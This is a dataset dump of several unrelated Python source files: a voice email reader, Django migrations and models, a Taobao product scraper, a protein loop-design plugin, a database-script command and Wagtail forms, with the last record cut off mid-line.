print only text email parts\r\n print(body)\r\n if(len(body) == 0):\r\n pass\r\n else:\r\n tts = gTTS(text=body, lang='en')\r\n ttsname=(\"printbody.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n print(\"=\"*100)\r\n # close the connection and logout\r\n imap.close()\r\n imap.logout()\r\n backtomenu()\r\n#-----------------------------------------------------------------------------------------------\r\n else:\r\n tts = gTTS(text=\"Please Select the correct choice.Going Back to Choices Menu\", lang='en')\r\n ttsname=(\"elsechoice.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n choices()\r\n\r\nmain_project()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":20105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"56426770","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('plataforma', '0047_auto_20151109_1206'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Conversacion',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('busqueda', models.ForeignKey(related_name='busqueda_', to='plataforma.ProblemaSolucion')),\n ('respuesta', models.ForeignKey(related_name='respuesta_', to='plataforma.ProblemaSolucion', null=True)),\n ],\n ),\n migrations.CreateModel(\n name='Mensaje',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('mensaje', models.TextField(null=True)),\n ('fecha', models.DateTimeField(auto_now=True)),\n ('conversacion', models.ForeignKey(to='plataforma.Conversacion')),\n ],\n ),\n ]\n","sub_path":"plataforma/migrations/0048_conversacion_mensaje.py","file_name":"0048_conversacion_mensaje.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"30763739","text":"import pymongo\nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import quote\nfrom config import *\n\nchrome_options = webdriver.ChromeOptions()\nchrome_options.add_argument('--headless')\nbrowser = webdriver.Chrome(chrome_options = chrome_options)\n\nwait = WebDriverWait(browser, 10)\nclient = pymongo.MongoClient(MONGO_URL)\ndb = client[MONGO_DB]\n\ndef index_page(page):\n print('正在爬取第', page, '页')\n try:\n url = 'https://s.taobao.com/search?q=' + quote(KEYWORD)\n browser.get(url)\n if page > 1:\n input = wait.until(\n EC.presence_of_element_located((By.CSS_SELECTOR, '#spudetail-pager div.form > input'))\n )\n submit = wait.until(\n EC.element_to_be_clickable((By.CSS_SELECTOR, '#spudetail-pager div.form > span.btn.J_Submit'))\n )\n input.clear()\n input.send_keys(page)\n submit.click()\n wait.until(\n EC.text_to_be_present_in_element((By.CSS_SELECTOR, '#spudetail-pager li.item.active > span'), str(page))\n )\n wait.until(\n EC.presence_of_element_located((By.CSS_SELECTOR, '.m-itemlist .items .item'))\n )\n get_products()\n except TimeoutException:\n index_page(page)\n\ndef get_products():\n html = browser.page_source\n doc = BeautifulSoup(html, 'lxml')\n items = doc.select('#spudetail-itemlist .items .item')\n for index in range(min(len(items), MAX_INDEX)):\n item = items[index]\n product = {\n 'image': item.select('.pic .img')[0]['src'],\n 'price': item.select('.price')[0].get_text(),\n 'deal': item.select('.deal-cnt')[0].get_text(),\n 'title': item.select('.title')[0].get_text(),\n 'shop': item.select('.shop')[0].get_text(),\n 'location': item.select('.location')[0].get_text()\n }\n print(product)\n save_to_mongo(product)\n\ndef save_to_mongo(result):\n try:\n if db[MONGO_COLLECTION].insert(result):\n print('存储到MongoDB成功')\n except Exception:\n print('存储到MongoDB失败')\n\ndef main():\n for i in range(1, MAX_PAGE + 1):\n index_page(i)\n browser.close()\n\nif __name__ == '__main__':\n main()\n","sub_path":"taobao/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"339162784","text":"# -*- coding: utf-8 -*-\n\nfrom django.db import models\nfrom django.contrib import admin\nfrom django.forms import ModelForm\nfrom django.contrib.contenttypes.fields import GenericForeignKey\nfrom django.contrib.contenttypes.generic import GenericRelation\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.models import User\nfrom mptt.models import MPTTModel, TreeForeignKey\nfrom django.utils import timezone\nfrom datetime import datetime\nfrom annoying.fields import JSONField # django-annoying\nfrom django.db.models import Q\nfrom datetime import datetime as dt\n\nclass MyBaseModel (models.Model):\n\t# fields\n\thash = models.CharField (\n\t\tmax_length = 256, # we don't expect using a hash more than 256-bit long!\n\t\tnull = True,\n\t\tblank = True,\n\t\tdefault = '',\n\t\tverbose_name = u'MD5 hash'\n\t)\n\t\t\n\t# basic value fields\n\tname = models.CharField(\n\t\t\tdefault = None,\n\t\t\tmax_length = 128,\n\t\t\tverbose_name = u'名称'\n\t\t)\n\tdescription = models.TextField (\n\t\t\tnull=True, \n\t\t\tblank=True,\n\t\t\tverbose_name = u'描述'\n\t\t)\n\t\n\t# help text\n\thelp_text = models.CharField (\n\t\t\tmax_length = 64,\n\t\t\tnull = True,\n\t\t\tblank = True,\n\t\t\tverbose_name = u'帮助提示'\n\t\t)\n\n\t# attachments\n\tattachments = GenericRelation('Attachment')\n\t\n\t# this is an Abstract model\n\tclass Meta:\n\t\tabstract=True\n\n\tdef __unicode__(self):\n\t\treturn self.name\n\n######################################################\n#\n#\tTags\n#\n#####################################################\nclass MyTaggedItem (models.Model):\n\t# basic value fields\n\ttag = models.SlugField(\n\t\t\tdefault = '',\n\t\t\tmax_length = 16,\n\t\t\tverbose_name = u'Tag'\n\t)\t\n\tdef __unicode__(self):\n\t\treturn self.tag\n\n######################################################\n#\n#\tAttachments\n#\n#####################################################\nclass Attachment (models.Model):\n\t# generic foreign key to base model\n\t# so we can link attachment to any model defined below\n\tcontent_type = models.ForeignKey(ContentType)\n\tobject_id = models.PositiveIntegerField()\n\tcontent_object = GenericForeignKey('content_type', 'object_id')\n\n\t# instance fields\n\tcreated_by = models.ForeignKey (\n\t\t\tUser,\n\t\t\tblank = True,\n\t\t\tnull = True,\n\t\t\tdefault = None,\n\t\t\tverbose_name = u'创建用户',\n\t\t\thelp_text = ''\n\t\t)\n\t\t\n\t# basic value fields\n\tname = models.CharField(\n\t\t\tdefault = 'default name',\n\t\t\tmax_length = 64,\n\t\t\tverbose_name = u'附件名称'\n\t\t)\n\tdescription = models.CharField (\n\t\t\tmax_length = 64,\n\t\t\tdefault = 'default description',\n\t\t\tverbose_name = u'附件描述'\n\t\t)\n\n\tfile = models.FileField (\n\t\t\tupload_to = '%Y/%m/%d',\n\t\t\tverbose_name = u'附件',\n\t\t\thelp_text = u'附件'\n\t\t)\t\n\n\tdef __unicode__(self):\n\t\treturn self.file.name\n\nclass AttachmentForm(ModelForm):\n\tclass Meta:\n\t\tmodel = Attachment\n\t\tfields = ['description','file']\n\n######################################################\n#\n#\tApp specific models\n#\n#####################################################\nclass MyZip(models.Model):\n\tzipcode = models.CharField(\n\t\tmax_length = 16,\n\t\tdefault = '',\n\t\tverbose_name = u'Zip'\n\t)\n\tcity = models.CharField(\n\t\tmax_length = 32,\n\t\tverbose_name = u'City'\n\t)\n\tstate = models.CharField(\n\t\tmax_length = 8,\n\t\tverbose_name = u'State abbr'\n\t)\n\nclass MyNotification(models.Model):\n\tcreated = models.DateTimeField(\n\t\tauto_now_add = True\n\t)\n\towner = models.ForeignKey (\n\t\tUser,\n\t\tdefault = None,\n\t\tverbose_name = u'Author',\n\t\thelp_text = ''\n\t)\n\ttitle = models.CharField(\n\t\tmax_length = 128,\n\t\tdefault = u'Announcement!',\n\t\tverbose_name = u'Notification title'\n\t)\n\tdescription = models.TextField(\n\t\tverbose_name = u'Notification message'\n\t)\n\nclass MyOrganizer(MyBaseModel):\n\tstate = models.ForeignKey(\n\t\t'MyZip',\n\t\tverbose_name = u'State, City, Zip code'\n\t)\n\taddress = models.CharField(\n\t\tmax_length = 128,\n\t\tnull = True,\n\t\tblank = True,\n\t\tverbose_name = u'Camp organizer location'\n\t)\n\temail = models.EmailField(\n\t\tblank = True,\n\t\tnull = True,\n\t\tverbose_name = u'Camp contact email'\n\t)\n\tphone = models.CharField(\n\t\tmax_length = 16,\n\t\tblank = True,\n\t\tnull = True,\n\t\tverbose_name =u'Camp contact phone'\n\t)\n\turl = models.URLField(\n\t\tblank = True,\n\t\tnull = True,\n\t\tverbose_name = u'Org home page'\n\t)\n\nclass MyCamp(MyBaseModel):\n\torganizers = models.ManyToManyField(\n\t\t'MyOrganizer',\n\t\tverbose_name = u'Camp organizer,'\n\t)\n\tregistration_start = models.DateField(\n\t\tverbose_name = u\"Registration starting date\"\n\t)\n\tregistration_end = models.DateField(\n\t\tverbose_name = u\"Registration deadline date\"\n\t)\n\t_start = models.DateField(\n\t\tverbose_name = u\"Camp starting date, calcuated\"\n\t)\n\t_end = models.DateField(\n\t\tverbose_name = u\"Camp's last day, calcuated\"\n\t)\n\temail = models.EmailField(\n\t\tblank = True,\n\t\tnull = True,\n\t\tverbose_name = u'Camp contact email'\n\t)\n\tphone = models.CharField(\n\t\tmax_length = 16,\n\t\tblank = True,\n\t\tnull = True,\n\t\tverbose_name =u'Camp contact phone'\n\t)\n\tperson = models.CharField(\n\t\tmax_length = 64,\n\t\tblank = True,\n\t\tnull = True,\n\t\tverbose_name = u'Camp contact person'\n\t)\n\tex_url = models.URLField(\n\t\tblank = True,\n\t\tnull = True,\n\t\tverbose_name = u'External camp home page'\n\t)\n\nclass MyCampProgram(MyBaseModel):\n\tcamp = models.ForeignKey(\n\t\t'MyCamp',\n\t\tverbose_name = u'Camp'\n\t)\n\n\t# we allow programs to be in locations different from camp itself\n\t# think about a camp having multiple locations, eg. on campus, \n\t# program A could be in building 123, where program B in building 456\n\tstate = models.ForeignKey(\n\t\t'MyZip',\n\t\tnull = True,\n\t\tblank = True,\n\t\tverbose_name = u'State, City, Zip code'\n\t)\n\taddress = models.CharField(\n\t\tmax_length = 128,\n\t\tnull = True,\n\t\tblank = True,\n\t\tverbose_name = u'Program location'\n\t)\n\n\t# enrollment age restrictions\n\tmin_age = models.IntegerField(\n\t\tblank = True,\n\t\tnull = True,\n\t\tverbose_name = u'Minimum age'\n\t)\n\tmax_age = models.IntegerField(\n\t\tblank = True,\n\t\tnull = True,\n\t\tverbose_name = u'Maximum age'\n\t)\n\tis_special_needs_ready = models.BooleanField(\n\t\tdefault = False,\n\t\tverbose_name = u'Is program available to people with special needs?'\n\t)\n\n\tstart = models.DateField(\n\t\tverbose_name = u\"Program starting date\"\n\t)\n\tend = models.DateField(\n\t\tverbose_name = u\"Program's last day\"\n\t)\n\tex_url = models.URLField(\n\t\tblank = True,\n\t\tnull = True,\n\t\tverbose_name = u'External camp program home page'\n\t)\n\tnotes = models.TextField(\n\t\tblank = True,\n\t\tnull = True,\n\t\tverbose_name = u'Program specific notes'\n\t)\n\nclass MyProgramSchedule(MyBaseModel):\n\tprogram = models.ForeignKey(\n\t\t'MyCampProgram',\n\t\tverbose_name = u'Camp program'\t\n\t)\n\tstarting_time = models.CharField(\n\t\tmax_length = 8,\n\t\tverbose_name = u'Program starting time'\n\t)\n\tending_time = models.CharField(\n\t\tmax_length = 8,\n\t\tverbose_name = u'Program ending time'\n\t)\n\tday = models.DateField(\n\t\tverbose_name = u'Day'\n\t)\n\tnotifications = models.ManyToManyField(\n\t\t'MyNotification',\n\t\tverbose_name = u'Program notifications'\n\t)","sub_path":"app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"551969466","text":"# -*- coding: utf-8 -*-\n\"\"\"\n.. codeauthor:: Jaume Bonet \n\n.. affiliation::\n Laboratory of Protein Design and Immunoengineering \n Bruno Correia \n\"\"\"\n# Standard Libraries\nimport os\nimport sys\nfrom pathlib import Path\nfrom typing import List, Tuple, Dict\nimport math\nfrom tempfile import NamedTemporaryFile\nimport shlex\nfrom ast import literal_eval\nfrom subprocess import run\nimport gzip\nimport itertools\n\n\n# External Libraries\nimport pandas as pd\nfrom pandas.compat import StringIO\nfrom SBI.structure import PDB, PDBFrame, ChainFrame\nimport SBI.structure.geometry as SBIgeo\nfrom rstoolbox.io import parse_rosetta_fragments, write_rosetta_fragments\n\n# This Library\nfrom topobuilder.case import Case\nimport topobuilder.core as TBcore\nimport topobuilder.utils as TButil\nfrom topobuilder import plugin_source\nfrom .core import core\n\n\n__all__ = ['apply']\n\n\ndef apply( cases: List[Case],\n prtid: int,\n loop_range: int = 3,\n top_loops: int = 20,\n harpins_2: bool = True,\n rmsd_cut: float = 5.0,\n **kwargs ) -> List[Case]:\n \"\"\"Use MASTER to cover the transitions between secondary structures.\n\n And something else.\n \"\"\"\n if TBcore.get_option('system', 'verbose'):\n sys.stdout.write('--- TB PLUGIN: LOOP_MASTER ---\\n')\n\n # Get list of PDS structures\n tempdb = False\n database = core.get_option('master', 'pds')\n database = Path(database)\n if database.is_file():\n pass\n elif database.is_dir():\n f = NamedTemporaryFile(mode='w', delete=False)\n if TBcore.get_option('system', 'debug'):\n sys.stdout.write('Temporary file for PDS database: {}\\n'.format(f.name))\n [f.write(str(x.resolve()) + '\\n') for x in database.glob('*/*.pds')]\n f.close()\n database = Path(f.name)\n tempdb = True\n else:\n raise ValueError('The provided MASTER database directory/list file cannot be found.')\n\n # Get ABEGOS\n abegodata = get_abegos()\n\n # Get FragFiles\n fragfiles = get_fragfiles()\n\n # Execute for each case\n for i, case in enumerate(cases):\n cases[i].data.setdefault('metadata', {}).setdefault('loop_fragments', [])\n cases[i].data.setdefault('metadata', {}).setdefault('loop_lengths', [])\n cases[i] = case_apply(case, database, loop_range, top_loops, rmsd_cut, abegodata, harpins_2, fragfiles)\n cases[i] = cases[i].set_protocol_done(prtid)\n\n if tempdb:\n os.unlink(f.name)\n\n return cases\n\n\ndef case_apply( case: Case,\n pds_list: Path,\n loop_range: int,\n top_loops: int,\n rmsd_cut: float,\n abego: pd.DataFrame,\n harpins_2: bool,\n fragfiles: pd.DataFrame ) -> str:\n \"\"\"\n \"\"\"\n # Loop MASTER is only applied to a Case with one single connectivity and already reoriented\n if case.connectivity_count > 1:\n raise ValueError('Loop MASTER can only be applied to one connectivity.')\n\n # We will need the coordinates of the secondary structures to execute this one\n # This will already cast it to absolute\n with TBcore.on_option_value('system', 'overwrite', False):\n case = plugin_source.load_plugin('builder').case_apply(case, connectivity=True)\n\n # Generate the folder tree for a single connectivity.\n folders = case.connectivities_paths[0].joinpath('loop_master')\n folders.mkdir(parents=True, exist_ok=True)\n\n # Find steps: Each pair of secondary structure.\n it = case.connectivities_str[0].split('.')\n steps = [it[i:i + 2] for i in range(0, len(it) - 1)]\n loop_step = case.cast_absolute()['configuration.defaults.distance.loop_step']\n lengths = case.connectivity_len[0]\n start = 1\n\n for i, sse in enumerate(steps):\n # 1. Make folders and files\n wfolder = folders.joinpath('loop{:02d}'.format(i + 1))\n wfolder.mkdir(parents=True, exist_ok=True)\n outfile = wfolder.joinpath('loop_master.jump{:02d}.pdb'.format(i + 1))\n masfile = outfile.with_suffix('.master')\n checkpoint = wfolder.joinpath('checkpoint.json')\n\n # 2. Check if checkpoint exists, retrieve and skip\n reload = TButil.checkpoint_in(checkpoint)\n if reload is not None:\n case.data['metadata']['loop_fragments'].append(reload)\n case.data['metadata']['loop_lengths'].append(int(reload['edges']['loop']))\n start += (int(reload['edges']['sse1']) + int(reload['edges']['loop']))\n continue\n\n # 2. Check hairpin\n sse1 = case.get_sse_by_id(sse[0])\n sse1_name = sse1['id']\n sse2 = case.get_sse_by_id(sse[1])\n sse2_name = sse2['id']\n is_hairpin = check_hairpin(sse1_name, sse2_name)\n\n if not masfile.is_file():\n # 3. Generate structures\n sse1, sse2 = make_structure(sse1, sse2, outfile)\n\n # 4. calculate expected loop length by loop_step\n Mdis, mdis = get_loop_length(sse1, sse2, loop_step, loop_range)\n\n # 5. Run master\n execute_master_fixedgap(outfile, pds_list, mdis, Mdis, rmsd_cut)\n\n # 6. Minimize master data (pick top_loopsx3 lines to read and minimize the files)\n match_count = minimize_master_file(masfile, top_loops, 3)\n\n # 7. Retrieve master data\n dfloop = process_master_data(masfile, sse1_name, sse2_name, abego, fragfiles, top_loops, is_hairpin and harpins_2)\n sse1l, loopl, sse2l = lengths[i], int(dfloop['loop_length'].values[0]), lengths[i + 1]\n total_len = sse1l + loopl + sse2l\n end_edge = total_len + start - 1\n edges = {'ini': int(start), 'end': int(end_edge), 'sse1': int(sse1l), 'loop': int(loopl), 'sse2': int(sse2l)}\n if TBcore.get_option('system', 'debug'):\n sys.stdout.write('\\nINI: {}; END: {}; SSE1: {}; LOOP: {}; SSE2: {}\\n\\n'.format(start, end_edge, sse1l, loopl, sse2l))\n sys.stdout.write(dfloop.to_string() + '\\n')\n\n # 8. Make Fragments\n loop_data = make_fragment_files(dfloop, edges, masfile)\n loop_data['match_count'] += match_count\n case.data['metadata']['loop_fragments'].append(loop_data)\n case.data['metadata']['loop_lengths'].append(int(loopl))\n\n start += (sse1l + loopl)\n\n # Checkpoint save\n TButil.checkpoint_out(checkpoint, loop_data)\n\n return case\n\n\ndef make_fragment_files( dfloop: pd.DataFrame, edges: Dict, masfile: Path ) -> Dict:\n \"\"\"\n \"\"\"\n data = {'loop_length': int(dfloop.iloc[0]['loop_length']), 'abego': list(dfloop['loop'].values),\n 'edges': edges, 'fragfiles': [], 'match_count': 0}\n\n dfs3 = []\n dfs9 = []\n sample = math.ceil(200 / dfloop.shape[0])\n for i, row in dfloop.iterrows():\n # Remember: MASTER match starts with 0!\n dfs3.append((parse_rosetta_fragments(str(row['3mers']), source='{}_{}'.format(row['pdb'], row['chain']))\n .slice_region(row['match'][0][0] + 1, row['match'][1][1] + 1).sample_top_neighbors(sample)\n .renumber(edges['ini']).top_limit(edges['end'])))\n dfs9.append((parse_rosetta_fragments(str(row['9mers']), source='{}_{}'.format(row['pdb'], row['chain']))\n .slice_region(row['match'][0][0] + 1, row['match'][1][1] + 1).sample_top_neighbors(sample)\n .renumber(edges['ini']).top_limit(edges['end'])))\n\n # Merge Fragments\n dfs3all = dfs3[0]\n dfs9all = dfs9[0]\n for i in range(1, len(dfs3)):\n dfs3all = dfs3all.add_fragments(dfs3[i], ini=edges['ini'], how='append')\n dfs9all = dfs9all.add_fragments(dfs9[i], ini=edges['ini'], how='append')\n dfs3all = dfs3all.sample_top_neighbors(200)\n dfs9all = dfs9all.sample_top_neighbors(200)\n\n if TBcore.get_option('system', 'debug'):\n sys.stdout.write('Writing 3mers fragfile\\n')\n data['fragfiles'].append(write_rosetta_fragments(dfs3all, prefix=str(masfile.with_suffix('')), strict=True))\n if TBcore.get_option('system', 'debug'):\n sys.stdout.write('3mers fragfile: {}\\n'.format(data['fragfiles'][-1]))\n sys.stdout.write('Writing 9mers fragfile\\n')\n data['fragfiles'].append(write_rosetta_fragments(dfs9all, prefix=str(masfile.with_suffix('')), strict=True))\n if TBcore.get_option('system', 'debug'):\n sys.stdout.write('9mers fragfile: {}\\n'.format(data['fragfiles'][-1]))\n\n dfs3all.drop(columns=['pdb', 'frame', 'neighbors', 'neighbor',\n 'aa', 'sse', 'phi', 'psi', 'omega']).to_csv(data['fragfiles'][0] + '.csv', index=False)\n dfs9all.drop(columns=['pdb', 'frame', 'neighbors', 'neighbor',\n 'aa', 'sse', 'phi', 'psi', 'omega']).to_csv(data['fragfiles'][1] + '.csv', index=False)\n imageprefix = masfile.with_suffix('.fragprofile')\n TButil.plot_fragment_templates(dfs3all, dfs9all, imageprefix)\n\n return data\n\n\ndef get_fragfiles():\n \"\"\"\n \"\"\"\n fragpath = Path(core.get_option('master', 'fragments'))\n if TBcore.get_option('system', 'debug'):\n sys.stdout.write('Listing available fragment files at: {}\\n'.format(fragpath.name))\n if not fragpath.is_dir():\n raise IOError('MASTER fragments folder cannot be found.')\n return pd.DataFrame([(x.name[:4], x.name[5:6], x, y) for x, y in zip(sorted(fragpath.glob('*/*3mers.gz')),\n sorted(fragpath.glob('*/*9mers.gz')))],\n columns=['pdb', 'chain', '3mers', '9mers'])\n\n\ndef get_abegos():\n \"\"\"\n \"\"\"\n abegos = core.get_option('loop_master', 'abego')\n abegos = Path(abegos)\n if not abegos.is_file():\n raise IOError('The ABEGO fasta file has to be provided')\n\n if TBcore.get_option('system', 'debug'):\n sys.stdout.write('Loading ABEGO data from: {}\\n'.format(abegos.name))\n doopen = gzip.open if abegos.suffix == '.gz' else open\n abegodata = []\n with doopen(abegos, 'rt') as fd:\n for line1, line2 in itertools.zip_longest(*[fd] * 2):\n line2 = line2 if len(line2.strip()) != 0 else 'NON\\n'\n line1 = line1.strip().lstrip('>').split('_')\n abegodata.append('{},{},{}'.format(line1[0], line1[1], line2))\n abegodata = pd.read_csv(StringIO(''.join(abegodata)), names=['pdb', 'chain', 'abego'], header=None)\n abegodata = abegodata[abegodata['abego'] != 'NON']\n\n return abegodata\n\n\ndef make_structure(sse1: dict, sse2: dict, outfile: Path) -> Tuple[PDBFrame, PDBFrame]:\n \"\"\"\n \"\"\"\n sse1 = PDB(pd.DataFrame(sse1['metadata']['atoms'],\n columns=['auth_comp_id', 'auth_atom_id', 'auth_seq_id',\n 'Cartn_x', 'Cartn_y', 'Cartn_z'])).renumber(1)\n\n sse2 = PDB(pd.DataFrame(sse2['metadata']['atoms'],\n columns=['auth_comp_id', 'auth_atom_id', 'auth_seq_id',\n 'Cartn_x', 'Cartn_y', 'Cartn_z'])).renumber(sse1.iloc[-1]['auth_seq_id'] + 5)\n structure = pd.concat([sse1, sse2])\n structure['id'] = list(range(1, structure.shape[0] + 1))\n\n if TBcore.get_option('system', 'verbose'):\n sys.stdout.write('-> generating structure {}\\n'.format(outfile.resolve()))\n structure.write(output_file=str(outfile), format='pdb', clean=True,\n force=TBcore.get_option('system', 'overwrite'))\n\n return sse1, sse2\n\n\ndef get_loop_length(sse1: PDB, sse2: PDB, loop_step: int, loop_range: int) -> Tuple[int, int]:\n \"\"\"\n \"\"\"\n res1 = ChainFrame(PDB(sse1)).last_compound\n res2 = ChainFrame(PDB(sse2)).first_compound\n distance = SBIgeo.point_distance(res1[res1['label_atom_id'] == 'N'].coordinates,\n res2[res2['label_atom_id'] == 'N'].coordinates)\n distance = math.ceil(distance / loop_step)\n distance = [x for x in range(distance - loop_range - 1, distance + loop_range + 1) if x > 0]\n return max(distance), min(distance)\n\n\ndef execute_master_fixedgap(outfile: Path, pds_list: Path, mdis: int, Mdis: int, rmsd_cut: float):\n \"\"\"\n \"\"\"\n createPDS = core.get_option('master', 'create')\n createbash = '{0} --type query --pdb {1} --pds {2}'\n master = core.get_option('master', 'master')\n masterbash = '{0} --query {1} --targetList {2} --rmsdCut {6} --matchOut {3} --gapLen {4}-{5}'\n\n createcmd = shlex.split(createbash.format(createPDS, outfile, outfile.with_suffix('.pds')))\n mastercmd = shlex.split(masterbash.format(master, outfile.with_suffix('.pds'),\n pds_list, outfile.with_suffix('.master'), mdis, Mdis, rmsd_cut))\n if TBcore.get_option('system', 'verbose'):\n sys.stdout.write('-> Execute: {}\\n'.format(' '.join(createcmd)))\n with open(os.devnull, 'w') as devnull:\n run(createcmd, stdout=devnull)\n if TBcore.get_option('system', 'verbose'):\n sys.stdout.write('-> Execute: {}\\n'.format(' '.join(mastercmd)))\n with open(os.devnull, 'w') as devnull:\n run(mastercmd, stdout=devnull)\n\n\ndef minimize_master_file( masfile: Path, top_loops: int, multiplier: int ) -> int:\n \"\"\"\n \"\"\"\n try:\n with open(masfile) as fd:\n num_lines = sum(1 for line in fd if line.rstrip())\n with open(masfile) as fd:\n head = [next(fd) for x in range(top_loops * multiplier)]\n with open(masfile, 'w') as fd:\n fd.write(''.join(head))\n except StopIteration:\n pass\n return num_lines\n\n\ndef check_hairpin( name1: str, name2: str) -> bool:\n \"\"\"\n \"\"\"\n if name1[0] != name2[0]:\n return False\n if name1[-1] != 'E':\n return False\n if int(name1[1]) == int(name2[1]) + 1:\n return True\n if int(name1[1]) == int(name2[1]) - 1:\n return True\n return False\n\n\ndef process_master_data( masfile: Path,\n name1: str,\n name2: str,\n abego: pd.DataFrame,\n fragfiles: pd.DataFrame,\n top_loops: int,\n hairpin: bool ) -> pd.DataFrame:\n \"\"\"\n \"\"\"\n def cutter(row):\n match = row['match']\n # MASTER starts match count at 0!\n loop = row['abego'][match[0][1] + 1: match[1][0]]\n return row['abego'][match[0][0]: match[1][1] + 1], loop, len(loop)\n\n if masfile.with_suffix('.csv').is_file():\n df = pd.read_csv(masfile.with_suffix('.csv'))\n df['match'] = df['match'].apply(literal_eval)\n return df\n\n dfloop = TButil.parse_master_file(masfile)\n dfloop = dfloop.merge(abego, on=['pdb', 'chain']).merge(fragfiles, on=['pdb', 'chain']).dropna()\n dfloop[['abego', 'loop', 'loop_length']] = dfloop.apply(cutter, axis=1, result_type='expand')\n dfloop = dfloop.iloc[:top_loops]\n dfloop['length_count'] = dfloop.loop_length.map(dfloop.loop_length.value_counts())\n dfloop.drop(columns=['pds_path']).to_csv(masfile.with_suffix('.all.csv'), index=False)\n finaldf = dfloop.sort_values('rmsd').drop_duplicates(['loop'])\n\n pick = 0\n if hairpin and 2 in finaldf['loop_length'].values:\n pick = 2\n else:\n pick = finaldf[finaldf['length_count'] == finaldf['length_count'].max()]['loop_length'].min()\n finaldf = finaldf[finaldf['loop_length'] == pick]\n\n TButil.plot_loop_length_distribution(dfloop, pick, masfile.with_suffix(''), 'loop {} <-> {}'.format(name1, name2))\n\n df = finaldf.drop(columns=['pds_path'])\n df.to_csv(masfile.with_suffix('.csv'), index=False)\n return df\n","sub_path":"topobuilder/base_plugins/loop_master/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"322371177","text":"\"\"\"\nRun the specified database script\n\"\"\"\nimport util\nfrom util.decorators import requires\n\n\n@requires(\"django\")\ndef run(self, *args, **kwargs):\n \"\"\"\n Run the specified database script\n \"\"\"\n\n action = args[0] if args else None\n if not action:\n self.console.yellow(\"No command specified.\")\n return\n\n # if action == \"migrate\":\n # uri = util.io.relative(self.django.config.snapshot, \"migrate.sql\")\n # if util.io.exists(uri):\n # sql = util.io.read_file(uri, text=True).strip()\n # lines = sql.split(\"\\n\")\n # lines = [l for l in lines if l and not l.strip().startswith(\"-\") and len(l.strip()) > 3]\n # if lines:\n # # print(\"run the sql script...\")\n # self.console.yellow(\"*** RUN THE MIGRATE SQL FILE\")\n # settings = self.django.settings\n # database = settings[\"DATABASES\"]\n # database = database[\"default\"] if \"default\" in database else database\n # dbhost = database[\"HOST\"]\n # dbname = database[\"NAME\"]\n # dbuser = database[\"USER\"]\n # pwd = database[\"PASSWORD\"]\n # port = database[\"PORT\"]\n # cmd = \"export PGPASSWORD={pwd} && psql -h {host} -d {db} -U {user} -p {port} -a -w -f {sql}\".format(\n # pwd=pwd,\n # host=dbhost,\n # db=dbname,\n # user=dbuser,\n # port=port,\n # sql=uri\n # )\n # self.shell(cmd)\n #\n # cmd = \"{python} manage.py migrate\".format(python=self.interpreter.python)\n # # print(cmd)\n # self.shell(cmd)\n # return\n\n\n self.django.run_db_script(action, prompt=False)\n\n # uri = util.io.relative(self.django.config.snapshot, \"{name}.py\".format(name=action))\n # if util.io.exists(uri):\n # self.console.green(\"apply the db script - \" + action)\n # self.django.run_db_script(action, prompt=False)\n # return\n\n # def run_db_script(self, name, prompt=True):\n # uri = util.io.relative(self.config.snapshot, \"{name}.py\".format(name=name))\n # if util.io.exists(uri):\n # self.console.red(\"run db - \" + action)","sub_path":"commands/django/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"444858901","text":"from django.utils import timezone\nfrom django import forms\n\nfrom wagtail.admin.forms import WagtailAdminPageForm\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass ReactionQuestionChoiceForm(forms.Form):\n choice = forms.ChoiceField(\n required=True,\n error_messages={'required': _(\"You didn't select a choice\")})\n\n def __init__(self, *args, **kwargs):\n from molo.core.models import ReactionQuestionChoice\n super(ReactionQuestionChoiceForm, self).__init__(*args, **kwargs)\n self.fields['choice'].choices = [(\n c.pk, c.title) for c in ReactionQuestionChoice.objects.all()]\n\n\nclass ArticlePageForm(WagtailAdminPageForm):\n\n def clean(self):\n cleaned_data = super(ArticlePageForm, self).clean()\n\n hero_article = cleaned_data.get(\"feature_as_hero_article\")\n promote_date = cleaned_data.get(\"promote_date\")\n demote_date = cleaned_data.get(\"demote_date\")\n\n if hero_article:\n if not promote_date:\n self.add_error(\n \"promote_date\",\n \"Please specify the date and time that you would like \"\n \"this article to appear as the Hero Article.\"\n )\n\n if not demote_date:\n self.add_error(\n \"demote_date\",\n \"Please specify the date and time that you would like \"\n \"this article to be demoted as the Hero Article.\"\n )\n\n if promote_date and demote_date:\n if promote_date < timezone.now():\n self.add_error(\n \"promote_date\",\n \"Please select the present date, or a future date.\"\n )\n\n if demote_date < timezone.now() or 